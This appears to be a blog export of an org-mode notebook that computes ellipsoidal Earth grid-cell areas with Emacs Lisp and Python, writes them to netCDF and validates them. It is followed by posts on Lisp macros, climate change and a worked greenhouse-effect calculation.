<<ellipsoid-helpers>>
<<ellipsoid-distance>>
<<ellipsoid-rectanglearea>>

(defun ellipsoidrectangleareafromdeg (latdeg sidelength)
  "Calculate the rectangle area from the latitude LATDEG and the
SIDELENGTH given as degrees."
  (message (format "latdeg %f sidelength %f" latdeg sidelength))
  (let ((londeg 15) ; irrelevant due to symmetry
        (dlondeg sidelength)
        (dlatdeg sidelength)
        (a 6378.139)
        (f (/ 1 298.25642)))
    (let ((lon (* 2 float-pi (/ londeg 360.0))) ; 2π / 360
          (dlon (* 2 float-pi (/ dlondeg 360.0)))
          (lat (* 2 float-pi (/ latdeg 360.0))) 
          (dlat (* 2 float-pi (/ dlatdeg 360.0))))
      (ellipsoidrectanglearea a f lon lat dlon dlat))))

(defun ellipsoidrectangleareafromdegnumericalintegration (latdeg sidelength steps)
  "Calculate the rectangle area from the latitude LATDEG and the
  SIDELENGTH given as degrees by adding them in STEPS smaller steps per sidelength."
  (let ((area 0)
        (smallerside (/ (float sidelength)
                        (float steps))))
    (loop for i from 0 to (1- steps) by 1 do
          (message (format "i %f" i))
          (let ((smallerlat (+ latdeg (* smallerside i))))
            ; add steps times the area since the longitudinal
            ; calculation does not change, so we only need to
            ; calculate it once.
            (setq area (+ area (* steps 
                                  (ellipsoidrectangleareafromdeg
                                   smallerlat smallerside))))))

    area))
; no return value
nil

2.3.2 Results for direct calculation

Table 2: Area of lat-lon “square” with the given sidelength in \(km^2\), direct

| latitude ↓ \ sidelength → |     0.1° |         1° |          4° |
|---------------------------+----------+------------+-------------|
|                         0 | 123.9203 | 12391.0741 | 198026.1548 |
|                        10 | 121.9815 | 12179.9838 | 193733.6082 |
|                        20 | 116.2724 | 11592.4962 | 183457.2705 |
|                        30 | 106.9937 | 10649.2503 | 167557.9088 |
|                        40 |  94.4643 |  9382.6379 | 146580.1726 |
|                        45 |  87.1079 |  8640.9234 | 134399.3469 |
|                        50 |  79.1019 |  7834.8158 | 121219.4843 |
|                        60 |  61.4002 |  6055.4408 |  92285.3707 |
|                        70 |  41.9067 |  4099.4608 |  60666.5036 |
|                        80 |  21.2036 |  2025.2137 |  27301.2374 |
|                        85 |  10.5861 |   962.5255 |  10264.8590 |
|                        90 |   0.1071 |   107.0494 |   6844.8700 |

2.3.3 Results for summing up smaller squares.

  1. 100 squares per area (10 latitude steps)
    Table 3: Area of lat-lon “square” with the given sidelength in \(km^2\) sum 10
    latitude ↓ 0.1 1 4
    0 123.9203 12391.3918 198107.5151
    10 121.9815 12180.3007 193814.7025
    20 116.2724 11592.8099 183537.3359
    30 106.9937 10649.5549 167635.3476
    40 94.4643 9382.9239 146652.3820
    45 87.1079 8641.1954 134467.6868
    50 79.1019 7835.0702 121283.0172
    60 61.4002 6055.6486 92336.3892
    70 41.9067 4099.6076 60701.4093
    80 21.2036 2025.2881 27317.3197
    85 10.5862 962.5611 10270.9364
    90 0.1071 107.0533 6848.9244
  2. 10000 squares per area (100 latitude steps)
    Table 4: Area of lat-lon “square” with the given sidelength in \(km^2\) sum 100
    latitude ↓ 0.1 1 4
    0 123.9203 12391.3950 198108.3283
    10 121.9815 12180.3039 193815.5131
    20 116.2724 11592.8130 183538.1364
    30 106.9937 10649.5580 167636.1220
    40 94.4643 9382.9268 146653.1043
    45 87.1079 8641.1981 134468.3705
    50 79.1019 7835.0727 121283.6529
    60 61.4002 6055.6507 92336.8997
    70 41.9067 4099.6090 60701.7587
    80 21.2036 2025.2888 27317.4807
    85 10.5862 962.5615 10270.9973
    90 0.1071 107.0534 6848.9650
  3. 1000000 squares per area (1000 latitude steps)
    Table 5: Area of lat-lon “square” with the given sidelength in \(km^2\) sum 1000
    latitude ↓ 0.1 1 4
    0 123.9203 12391.3950 198108.3365
    10 121.9815 12180.3039 193815.5213
    20 116.2724 11592.8130 183538.1444
    30 106.9937 10649.5580 167636.1297
    40 94.4643 9382.9268 146653.1115
    45 87.1079 8641.1982 134468.3773
    50 79.1019 7835.0728 121283.6592
    60 61.4002 6055.6507 92336.9048
    70 41.9067 4099.6090 60701.7621
    80 21.2036 2025.2888 27317.4823
    85 10.5862 962.5615 10270.9979
    90 0.1071 107.0534 6848.9654
  4. 10 steps vs 1 step, relative
    Table 6: Area of lat-lon “square” with the given sidelength in \(km^2\) 10 vs. 1
    latitude ↓ 0.1 1 4
    0 0.0000% 0.0026% 0.0411%
    10 0.0000% 0.0026% 0.0419%
    20 0.0000% 0.0027% 0.0436%
    30 0.0000% 0.0029% 0.0462%
    40 0.0000% 0.0030% 0.0493%
    45 0.0000% 0.0031% 0.0508%
    50 0.0000% 0.0032% 0.0524%
    60 0.0000% 0.0034% 0.0553%
    70 0.0000% 0.0036% 0.0575%
    80 0.0000% 0.0037% 0.0589%
    85 0.0000% 0.0037% 0.0592%
    90 0.0000% 0.0037% 0.0592%
  5. 100 steps vs 10 steps, relative
    Table 7: Area of lat-lon “square” with the given sidelength in \(km^2\) 100 vs. 10
    latitude ↓ 0.1 1 4
    0 0.000000% 0.000026% 0.000410%
    10 0.000000% 0.000026% 0.000418%
    20 0.000000% 0.000027% 0.000436%
    30 0.000000% 0.000029% 0.000462%
    40 0.000000% 0.000030% 0.000493%
    45 0.000000% 0.000031% 0.000508%
    50 0.000000% 0.000032% 0.000524%
    60 0.000000% 0.000034% 0.000553%
    70 0.000000% 0.000036% 0.000576%
    80 0.000000% 0.000037% 0.000589%
    85 0.000000% 0.000037% 0.000592%
    90 0.000000% 0.000037% 0.000593%
  6. 1000 steps vs 100 steps, relative
    Table 8: Area of lat-lon “square” with the given sidelength in \(km^2\) 1000 vs 100
    latitude ↓ 0.1 1 4
    0 0.000000% 0.000000% 0.000004%
    10 0.000000% 0.000000% 0.000004%
    20 0.000000% 0.000000% 0.000004%
    30 0.000000% 0.000000% 0.000005%
    40 0.000000% 0.000000% 0.000005%
    45 0.000000% 0.000000% 0.000005%
    50 0.000000% 0.000000% 0.000005%
    60 0.000000% 0.000000% 0.000006%
    70 0.000000% 0.000000% 0.000006%
    80 0.000000% 0.000000% 0.000006%
    85 0.000000% 0.000000% 0.000006%
    90 0.000000% 0.000000% 0.000006%

3 Implementation

The theory part is almost done. The only thing left to do: use the algorithm to generate a list of areas per 1° latitude and pass that to a Python script which writes it into a netCDF4 file for later usage.

I need a python snippet which takes a list of values from lat 0° to lat 90° as input and turns it into a 360°×180° map.

Or I could just write the data from the elisp code to a file and read that.

3.1 Write data files

<<ellipsoidrectangleareafromdeg>>
(with-temp-file "transcomellipticlat90-sum1000.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000)))
        (insert "\n")))
; dang, this is beautiful!
<<ellipsoidrectangleareafromdeg>>
(with-temp-file "transcomellipticlat90-direct.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (ellipsoidrectangleareafromdegnumericalintegration lat 1 1)))
        (insert "\n")))
<<ellipsoidrectangleareafromdeg>>
(with-temp-file "transcomellipticlat90-sum1000vsdirect.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (- (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000) 
                    (ellipsoidrectangleareafromdegnumericalintegration lat 1 1))))
        (insert "\n")))
<<ellipsoidrectangleareafromdeg>>
<<spherearea>>
(with-temp-file "transcomellipticlat90-sum1000vssphere.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string 
                 (- (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000) 
                    (spherearea lat 1))))
        (insert "\n")))
<<spherearea>>
(with-temp-file "transcomellipticlat90-sphere.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string (spherearea lat 1)))
        (insert "\n")))
(with-temp-file "transcomellipticlat90-sum1000vssphere.dat" 
  ; switch to the opened file
  (switch-to-buffer (current-buffer))
  (loop for lat from 0 to 90 do
        (insert (concat (number-to-string lat) " "))
        (insert (number-to-string (- (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000) (spheresegmentarea lat 1))))
        (insert "\n")))

3.2 Write datafiles to netcdf and plot them

Now just read out that file as CSV.

3.2.1 First define the plotstyle

The following codeblock can be summoned into other code via

<<addplotstyle>>
# add map lines
m.drawcoastlines()
m.drawparallels(np.arange(-90.,120.,30.), 
                labels=[False,True,True,False])
m.drawmeridians(np.arange(0.,420.,60.), 
                labels=[True,False,False,True])
m.drawmapboundary(fill_color='aqua')

3.2.2 Now read datafiles

import numpy as np
import pylab as pl
import mpl_toolkits.basemap as bm
import netCDF4 as nc
def singlehemispherelats2map(northernlats):
    """Turn the northern lats (0-90) into a map (180,360)."""
    # duplicate the northernlats
    lats = np.zeros((180, ))
    lats[0:90] = northernlats[:0:-1,1]
    lats[90:] = northernlats[1:,1]
    # and blow them up into a map
    lons = np.ones((360, ))
    lats = np.matrix(lats)
    lons = np.matrix(lons)
    mapscaling = lons.transpose() * lats
    mapscaling = mapscaling.transpose()
    return mapscaling

# first read the file
with open("transcomellipticlat90-sum1000.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscaling = singlehemispherelats2map(northernlats)  
with open("transcomellipticlat90-sum1000vsdirect.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingdiff = singlehemispherelats2map(northernlats)
with open("transcomellipticlat90-direct.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingdirect = singlehemispherelats2map(northernlats)
with open("transcomellipticlat90-sphere.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingsphere = singlehemispherelats2map(northernlats)
with open("transcomellipticlat90-sum1000vssphere.dat") as f:
    northernlats = np.genfromtxt(f, delimiter=" ")
mapscalingdiffsphere = singlehemispherelats2map(northernlats)

3.2.3 and plot them

# several different plots:
<<plotareamapperpixel>>
<<plotareamapperpixeldirect>>
<<plotareamapperpixelerror>>
<<plotareamapperpixelrelerror>>
<<plotareamapperpixelsphereerror>>
# plot it for representation
m = bm.Basemap()
m.imshow(mapscaling)
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
<<addplotstyle>>
pl.title("Surface Area 1x1 [$km^2$]")
pl.savefig("eartharea_1x1.png")
pl.close()
print """\n\n#+caption:Area when summing 1000x1000 smaller areas
[[./eartharea_1x1.png]]"""
m = bm.Basemap()
m.imshow(mapscaling)
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
# summon map style! :)
<<addplotstyle>>
pl.title("Surface Area 1x1, no numerical integration [$km^2$]")
pl.savefig("earthareadirect_1x1.png")
pl.close()
print "\n\n#+caption:Area when using just one square\n[[./earthareadirect_1x1.png]]"
m = bm.Basemap()
m.imshow(mapscalingdiff)
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
pl.title("Surface Area 1x1 difference: sum 1000 vs direct [$km^2$]")
pl.savefig("eartharea1000vs1_1x1.png")  # save as a clean netCDF4 file
pl.close()
print "\n\n#+caption:Difference between summing smaller squares", 
print "and just using one square\n[[./eartharea1000vs1_1x1.png]]"
m = bm.Basemap()
m.imshow(np.log(np.abs(mapscalingdiff/mapscaling)))
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("relative error per pixel, logarithmic")
pl.title("Surface Area 1x1 diff relative: sum 1000 vs direct")
pl.savefig("eartharea1000vs1rel_1x1.png")  # save as a clean netCDF4 file
pl.close()
print """\n\n#+caption:Relative Area Error by not integrating (logscale)
[[./eartharea1000vs1rel_1x1.png]]"""
m = bm.Basemap()
m.imshow(np.log(np.abs(mapscalingdiffsphere/mapscaling)))
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("relative error per pixel, logarithmic")
pl.title("Surface Area 1x1 diff relative: sum 1000 vs sphere")
pl.savefig("eartharea1000vssphererel_1x1.png")
pl.close()
print """\n\n#+caption:Relative Error from Sphere (logscale)
[[./eartharea1000vssphererel_1x1.png]]"""

3.2.4 Write the data

<<readcsvareafiles>>  
<<plotareamaps>>
D = nc.Dataset("eartharea.nc", "w")
D.comment = "Created with tm5tools/ct2pyshell/transcomareas.org"
D.createDimension("longitude", 360)
D.createDimension("latitude", 180)
area = D.createVariable("1x1", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = "from 180W to 180E and from 90S to 90N"
area[:] = mapscaling
area = D.createVariable("1x1_1000vs1", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = ("Difference between the direct calculation of the "
"area and summing up 1000x1000 smaller areas."
"from 180W to 180E and from 90S to 90N")
area[:] = mapscalingdiff
area = D.createVariable("1x1_direct", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = ("Area calculated without numerical intergration (bigger errors!). "
"from 180W to 180E and from 90S to 90N")
area[:] = mapscalingdirect
area = D.createVariable("1x1_sphere", "f8", ("latitude", "longitude"))
area.units = "km^2"
area.comment = ("Area calculated on a simple sphere. "
"from 180W to 180E and from 90S to 90N")
area[:] = mapscalingsphere
# close the dataset so the data is actually written to disk
D.close()

eartharea_1x1.png

earthareadirect_1x1.png

eartharea1000vs1_1x1.png

eartharea1000vs1rel_1x1.png

eartharea1000vssphererel_1x1.png

4 Validation

4.1 Surface Area of the Earth

Should be around 510 million km²

(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (spherearea lat 1))))
  (/ (* 2 360 s) 1.0e6)) ; million square kilometers
514.5026761832414
(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (ellipsoidrectangleareafromdegnumericalintegration lat 1 1))))
  (/ (* 2 360 s) 1.0e6)) ; million square kilometers
509.55872913305257
(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (ellipsoidrectangleareafromdegnumericalintegration lat 1 10))))
  (/ (* 2 360 s) 1.0e6)) ; million square kilometers
509.57373786401286
(let ((s 0))
  (loop for lat from 0 to 90 do
        (setq s (+ s (ellipsoidrectangleareafromdegnumericalintegration lat 1 1000))))
  (/ (* 2 360 s) 1.0e6)) ; million square kilometers
509.5738894527161

4.2 Area of Australia + New Zealand (Transcom Region 10)

Should be around 7,692,024 km² + 269,652 km² = 7,961,676 km²

import netCDF4 as nc
import numpy as np
import pylab as pl

D = nc.Dataset("eartharea.nc")
area = D.variables["1x1"][:]
T = nc.Dataset("../plotting/transcom_regions_ct/regions.nc")
transcom = T.variables["transcom_regions"][:]
mask = transcom[::-1,:] == 10
pl.imshow(mask*area)
bar = pl.colorbar()
bar.set_label("area per pixel [$km^2$]")
pl.title("Area of Australia and New Zealand in [$km^2$] per pixel")
pl.savefig("area-australia.png")
# pl.show()
return np.sum(mask*area)
7976938.58492

area-australia.png

Figure 1: Area of Australia and New Zealand

5 Summary

The area of 1x1 degree pixels on a worldmap in ellipsoid approximation is available in the file eartharea.nc in the variable “1x1”. Visualized it looks like this:

eartharea_1x1.png

Figure 2: Surface Area of the Earth in \(km^2\)

To convert a flux in mol/(m²·s) into emissions in mol/s, just multiply each gridpoint by \(10^6\) m²/km² and by the corresponding gridpoint of the area variable:

<<prep>>
import numpy as np
import pylab as pl
import mpl_toolkits.basemap as bm
import netCDF4 as nc
D = nc.Dataset("eartharea.nc")
area = D.variables["1x1"][:]
flux = np.ones((180, 360)) * np.random.normal(0.0, 1.e-6, (180, 360))
emiss = flux*area
m = bm.Basemap()
m.imshow(emiss)
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("emissions [mol/s]")
pl.title("random flux $0 \pm 1.e-6 \\frac{mol}{m^{2}s}$ turned to random emissions")
filename = "randomemissions.png"
pl.savefig(filename)
print "#+caption: Random emissions in simple lat/lon plot."
print "[[./" +  filename + "]]"
# plot again, with hobo-dyer projection (equal-area)
pl.close()
m = plotmap(emiss)
<<addplotstyle>>
bar = pl.colorbar()
bar.set_label("emissions [mol/s]")
pl.title("random emissions in hobo-dyer projection")
filename = "randomemissionshobo-dyer.png"

pl.savefig(filename)
print """\n\n#+caption: Random Emissions in Hobo Dyer Projection
[[./""" +  filename + "]]"

randomemissions.png

Figure 3: Random emissions in simple lat/lon plot.

randomemissionshobo-dyer.png

Figure 4: Random Emissions in Hobo Dyer Projection

def plotmap(array):
    """Plot an array as map."""
    m = bm.Basemap(projection='cea', lat_ts=37.5)
    ny, nx = array.shape[:2]
    lons, lats = pl.meshgrid(range(-nx/2, nx/2 + nx%2),
                             range(-ny/2, ny/2 + ny%2))
    x, y = m(lons, lats)
    arr = array.copy()
    for i in arr.shape[2:]:
        arr = arr[:,:,0]
    m.pcolormesh(x, y, arr)
    return m

5.1 Landarea

Estimating the land area for a given lat-lon region (this requires a land/sea map in the file t3_regions_landsea.nc, e.g. from TM5-4DVar, see tm5.sf.net).

<<prep>>
import netCDF4 as nc
import numpy as np
import pylab as pl
import mpl_toolkits.basemap as bm


def landarea(lat0, lon0, lat1, lon1):
    """Calculate the land area in the rectangle defined by the
    arguments.

    :param lat0: latitude in degree. Southern Hemisphere negative.
    :param lon0: longitude in degree. West negative (East positive).

    :returns: landarea within the rectangle in km^2

    >>> samarea = 17.840 * 1000000 # km^2
    >>> ae = landarea(15, -90, -60, -30)
    >>> 0.99 * samarea < ae < 1.01 * samarea
    True
    """
    lat0idx = int(lat0 + 90)
    lat1idx = int(lat1 + 90)
    if lat0idx > lat1idx:
        tmp = lat1idx
        lat1idx = lat0idx
        lat0idx = tmp
    lon0idx = int(lon0 + 180)
    lon1idx = int(lon1 + 180)
    if lon0idx > lon1idx:
        tmp = lon1idx
        lon1idx = lon0idx
        lon0idx = tmp
    D = nc.Dataset("eartharea.nc")
    T = nc.Dataset("t3_regions_landsea.nc")
    area = D.variables["1x1"][:]
    landfraction05x05 = T.variables["LSMASK"][:]
    landfraction1x1 = np.zeros((180,360)) # latxlon
    for i in range(landfraction1x1.shape[0]):
        for j in range(landfraction1x1.shape[1]):
            landfraction1x1[i,j] = np.mean(landfraction05x05[i*2:i*2+2,:][:,j*2:j*2+2])
    landarea = area * landfraction1x1
    # m = plotmap(landfraction1x1)
    # pl.show()
    # m = plotmap(landarea)
    # pl.show()
    return np.sum(landarea[lat0idx:lat1idx+1,:][:,lon0idx:lon1idx])


if True or __name__ == "__main__":
    import doctest
    doctest.testmod()

6 Notes

6.1 Understanding the macro to turn variables to float

Most of the code snippets here are thanks to ggole in #emacs on irc.freenode.net (What is IRC?).

6.1.1 Single variable

(defmacro turntofloatsingle (var)
  (list 'setq var (list 'float var)))

6.1.2 Backtick notation

<<turntofloat-single>>
(defmacro turntofloatbackticks (&rest vars)
  "Turn a list of items to floats using backtick notation."
  `(progn ,@(mapcar 
             (lambda (var) 
               `(turntofloatsingle ,var)) 
             vars)))

6.1.3 Use Mapcar

<<turntofloat-single>>
(defmacro turntofloat (&rest vars)
  "Turn a list of items to floats (without using backticks)."
  ; cons turns this into a call of progn on the list returned by
  ; mapcar
  (cons 'progn (mapcar 
                (lambda (var) 
                  (list 'turntofloatsingle var))
                vars)))

6.1.4 Common Lisp collect

<<turntofloat-single>>
(defmacro turntofloatcollect (&rest vars)
  "Turn a list of items to floats, using the collect directive of loop."
  ; execute progn on the list returned by the loop
  (cons 'progn 
        ; loop ... collect returns a list of all the loop results.
        (loop for var in vars collect 
              (list 'turntofloatsingle var))))

6.1.5 Explicit List Building

<<turntofloat-single>>

; build the list explicitly to make it easier for me to understand
; what the macro does
(defmacro turntofloatexplicit (&rest vars)
  "Turn a list of items to floats (using explicit list building
instead of mapcar)."
  ; prepare an empty list of function calls
  (let ((funclist '()))
    ; for each variable add a call to the single-item macro
    (loop for var in vars do
          ; (list 'turntofloatsingle var) creates the call to
          ; turntofloatsingle with the variable which is referenced by
          ; var. Push puts that at the beginning of the funclist.
          (push (list 'turntofloatsingle var) funclist))
    ; to ensure the right order of operations, we reverse the funclist
    (setq funclist (reverse funclist))
    ; cons turns this into a call of progn on the list. We need progn,
    ; because the funclist contains multiple function calls.
    (cons 'progn funclist)))

6.1.6 Mapcar and Callf

<<turntofloat-single>>
; Common Lisp Macro to turn the place to a float in one step.
(defmacro turntofloatinline (&rest places)
  "Turn a list of items to floats using an inline function call."
  `(progn ,@(mapcar 
             (lambda (place) 
               `(callf float ,place)) places)))

6.1.7 Test the results

<<turntofloat-collect>>
(setq a 1 b 3.8 c 2)
(turntofloatcollect a b c)
(message (number-to-string c))
Attachment (size):
eartharea-eartharea_1x1.png (88.19 KB)
eartharea.nc (1.98 MB)
eartharea.pdf (1.19 MB)
eartharea-area-australia.png (33.3 KB)
eartharea-eartharea1000vs1_1x1.png (86.35 KB)
eartharea-eartharea1000vssphererel_1x1.png (98.72 KB)
eartharea-eartharea1000vs1rel_1x1.png (92.39 KB)
eartharea-earthareadirect_1x1.png (90.13 KB)
eartharea-randomemissions.png (353.01 KB)
eartharea-randomemissionshobo-dyer.png (239.52 KB)
eartharea-segmentellipsoid.png (5.39 KB)
eartharea-segmentellipsoiddistances.png (2.72 KB)
eartharea-segmentsphere.png (5.24 KB)
eartharea.org (42.75 KB)

Thanks for all the fish

AGU publications published "The world's biggest gamble", a short commentary on how to go on with climate change.

I am hard pressed not to become sarcastic. Not because the commentary is wrong. It’s spot on. But because we, as a species, are …

I’ll stop speaking my mind for now. Let’s hope that hope wins against frustration and our children don’t have to pay too dearly for the idiocy of my generation and the generation before.

Oh well, Happy Halloween and enjoy Samhain.

The greenhouse effect, calculated again

New version: draketo.de/wissen/greenhouse-effect-calculated

PDF

PDF (to print)

Org (source)

I did not want to talk about the greenhouse effect without having checked the math and physics. Therefore I calculated it myself.

If you want all links to work, read the the PDF-version.

The greenhouse effect describes the effect of the atmosphere on Earth’s surface temperature. The simplest example contrasts the surface temperature of a planet without atmosphere to the surface temperature with a single insulating layer above the surface.

The incoming radiation from the Sun provides the earth with a constant source of energy. If it did not get rid of that energy somehow, it would get hotter every day, eventually melt and vaporize. It’s evident that this does not happen (otherwise we would not be here to think about it).

As shown by \citet{Stefan1879} and \citet{Boltzmann1884}, the total energy emission from a perfect black body (a body which absorbs all incoming radiation) per unit area is given by

\begin{equation} E = \sigma T^4 \end{equation}

with the Stefan–Boltzmann constant

\begin{equation} \sigma = \frac{2 \pi^5 k^4}{15 c^2 h^3} \approx 5.67 \cdot 10^{-8} W m^{-2} K^{-4} \end{equation}

From satellite measurements in the Earth’s orbit we know that the incident solar radiation delivers an average energy flux \(j\) between 1361 \(Wm^{-2}\) during the solar minimum and 1363 \(Wm^{-2}\) during the solar maximum \citep{KoppSolarConstant2011}.

This radiation hits the cross section of the Earth, the area of a circle with the radius of the Earth: \(\pi R^2\). The same amount of energy is radiated away again by the Earth system, as evidenced by the Earth neither melting nor freezing. But the outgoing radiation leaves from the whole surface of the Earth, not just from its cross section. The total surface of a sphere is \(4 \times \pi R^2\), or \(4 \times\) its cross section, so the energy radiated per unit area is just 25% of the incoming energy per unit cross-section area: \(σT_{out}^4 = 0.25 \times σT_{in}^4\)

greenhouse-effect due to the difference between directed solar-irradiation and radial earth-radiation
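Written as an explicit energy balance, the power absorbed over the cross section must equal the power emitted over the full surface:

\begin{equation} \pi R^2 \, j = 4 \pi R^2 \, \sigma T_{out}^4 \quad \Rightarrow \quad \sigma T_{out}^4 = \frac{j}{4} \approx \frac{1362~Wm^{-2}}{4} \approx 340.5~Wm^{-2} \end{equation}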

The incident radiation delivers an energy flux of \(E_i = 1362~Wm^{-2}\), so the outgoing radiation of a perfect black body would be \(E_o = 340.5~Wm^{-2}\), which is consistent with a temperature of

\begin{equation} T = \left(\frac{E}{σ}\right)^{\frac{1}{4}} = \left(\frac{340.5 \cdot 15 c^2 h^3}{2 \pi^5 k^4}\right)^{\frac{1}{4}} K \approx \left(\frac{340.5}{5.67 \cdot 10^{-8}}\right)^{\frac{1}{4}} K = 278.623 K \end{equation}

This gives an average surface temperature of

\begin{equation} (278.62 - 273.15) ^\circ C = 5.47 ^\circ C \end{equation}

for a perfectly black Earth without atmosphere.

Due to the simplifications used, this value is about \(8.5 K\) lower than the measured mean sea and land surface temperature of \(14 ^\circ C\) for the base period 1961-90 \citep{Jones1999,Rayner2006}.

Historically the next step after the black body estimation was to take the albedo into account: The amount of incoming radiation reflected directly back into space.

If we take into account that the Earth surface and clouds reflect roughly 30% of the visible light back into space, the Earth only absorbs roughly 70% of the incoming energy, and only this part needs to be radiated back. For details, see \citet{Muller2012} and \citet{Muller2013}.1 The equilibrium temperature changes to 255 Kelvin, which is just about -18 °C. Note that changing the albedo by 1 percentage point (to 29% or 31%) would change the temperature by roughly 1 K.

;; equilibrium temperature (in Kelvin) for an Earth with albedo 0.3,
;; from the Stefan-Boltzmann law with the physical constants below
(let* ((albedo 0.3)
       (sol 1362)
       (incoming-watt (* (- 1 albedo) (/ sol 4)))
       (c 3e8)
       (h 6.62607e-34)
       (k 1.38065e-23)
       (pi 3.14159))
  (expt 
   (/ (* incoming-watt 15 c c (expt h 3))
      (* 2 (expt pi 5) (expt k 4)))
   0.25))
254.61953320379396

\begin{equation} T = \left(\frac{E}{σ}\right)^{\frac{1}{4}} = \left(\frac{0.7 \cdot 340.5 \cdot 15 c^2 h^3}{2 \pi^5 k^4}\right)^{\frac{1}{4}} K \approx \left(\frac{238.0}{5.67 \cdot 10^{-8}}\right)^{\frac{1}{4}} K = 254.6 K \end{equation}
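A short check of the albedo sensitivity mentioned above: since \(T^4 \propto (1-\alpha)\), changing the albedo \(\alpha\) by one percentage point shifts the equilibrium temperature by roughly

\begin{equation} \Delta T \approx \frac{T}{4} \cdot \frac{\Delta \alpha}{1 - \alpha} \approx \frac{255~K}{4} \cdot \frac{0.01}{0.7} \approx 0.9~K \end{equation}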

There are small additional factors in play:

  • the difference between effective temperature (the temperature inferred from the emitted radiation, as for a star) and air temperature (measured on Earth)
  • emissivity: Common values range from 0.90 to 0.98, with forests and urban areas staying close around 0.95, grassland peaking at 0.95 but with a noticeable tail towards 0.90 and barren soil and sparsely vegetated areas forming a broad distribution between 0.92 and 0.96 \citep{Jin2006}. Snow 0.99 (Wan2002).

But with these we’re still roughly 30 Kelvin away from actual temperatures. These are reached through absorption and radial re-radiation of outgoing energy, which effectively provides the Earth with insulation, most effective in the infrared.

This is what is typically called the greenhouse effect: Infra-red emissions by the Earth are absorbed by greenhouse gases in the atmosphere, so the Earth needs to be warmer to get rid of the same amount of received energy.

Greenhouse gases have a net effect on the temperature, because the outgoing radiation mostly consists of thermal infrared light (TIR), while the incoming radiation mostly consists of near infrared (NIR), visible (VIS) and ultraviolet (UV) light. Let’s take the oldest account of this absorption: \citet[“On the Influence of Carbonic Acid in the Air upon the Temperature of the Ground”]{Arrhenius1896} describes different absorption of moonlight depending on the wavelength of the light. Half of the light absorbed in the atmosphere is radiated outwards, the other half inwards.

For the actual calculation, we use more recent results: \citet[“The natural greenhouse effect of atmospheric oxygen (O2) and nitrogen (N2)”]{Hoepfner2012}. They take into account the structure of the atmosphere by building on the well-established Karlsruhe Optimized and Precise Radiative transfer Algorithm (KOPRA).

The publication by \citet[]{Hoepfner2012} showed that the outgoing longwave radiation without gas would be 365.7 W/m\(^2\), while with greenhouse gases it is 242.7 W/m\(^2\). That’s a 33.6 % decrease in emission, so we need 1.5 times higher emissions to reach equilibrium. Let’s factor this into the equations, and also use an emissivity of 0.95.

;; equilibrium temperature (in Kelvin) including the greenhouse factor
;; 365.7/242.7 from Hoepfner2012 and an emissivity of 0.95
(let* ((albedo 0.3)
       (emiss 0.95)
       (sol 1362)
       (incoming-watt (* (- 1 albedo) (/ sol 4)))
       (c 3e8)
       (h 6.62607e-34)
       (k 1.38065e-23)
       (pi 3.14159))
  (expt 
   (/ (* (/ 365.7 242.7) incoming-watt (/ 1 emiss) 15 c c (expt h 3))
      (* 2 (expt pi 5) (expt k 4)))
   0.25))
       ;; for the numerator
       ;; (* (/ 365.7 242.7) (/ 1 emiss) incoming-watt))
285.7423501045961

\begin{equation} T = \left(\frac{E}{σ}\right)^{\frac{1}{4}} = \left(\frac{\frac{365.7}{242.7} \cdot 0.7\frac{1}{0.95} \cdot 340.5 \cdot 15 c^2 h^3}{2 \pi^5 k^4}\right)^{\frac{1}{4}} K \approx \left(\frac{377.49}{5.67 \cdot 10^{-8}}\right)^{\frac{1}{4}} K = 285.74 K \end{equation}

We get 285.74 K as equilibrium temperature. That’s around 12.6°C, so now we’re just 1.4 Kelvin away from the actual \(14 ^\circ C\) for the base period 1961-90 \citep{Jones1999,Rayner2006}. There are still effects missing in the calculations, but the intention of this guide is not to create a new climate model, but to show the fundamental physical effects. Remember also that changing the surface albedo by 1 percent point (to 29% or 31%) would change the temperature by roughly 1 K, so getting within less than 2 °C of the measured temperature is already pretty good. Going further would require a much stricter treatment of surface albedo that goes into too much detail for an article.

Therefore we’ll round this up with an important test that is only weakly affected by the surface albedo:

What happens if we increase the absorption by CO\(_2\)? Do we see global warming?

For this test the result is already close enough to the measured temperature that we can take the difference between values with different parameters to get the effect of these parameters and remove biases which are present in both values.

To calculate global warming due to doubled CO₂, we cannot just double the absorption, because the absorption bands get saturated. The \citet[IPCC working group 1 (physical science basis)]{IPCCRadiativeForcingMyhre2013} gives the increase in radiative forcing due to increased CO\(_2\) levels from the 1950 concentrations of about 310 ppm to the 2010 concentrations of 390 ppm as about 1.2 W/m\(^2\).2

